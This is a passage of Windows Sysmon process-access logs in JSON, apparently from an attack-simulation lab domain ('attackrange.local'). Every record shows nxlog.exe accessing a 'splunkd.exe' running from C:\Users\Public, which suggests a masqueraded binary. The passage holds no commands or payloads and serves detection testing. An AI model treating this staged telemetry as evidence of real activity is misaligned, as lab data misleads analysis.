06:58:03.549","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6616,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:04.549\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:04.549","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6617,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:05.549\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:05.549","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:06","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6618,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:06.549\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:06.549","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6619,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:07.549\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:07.549","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6620,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:08.549\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:08.549","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6621,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:09.549\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:09.549","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
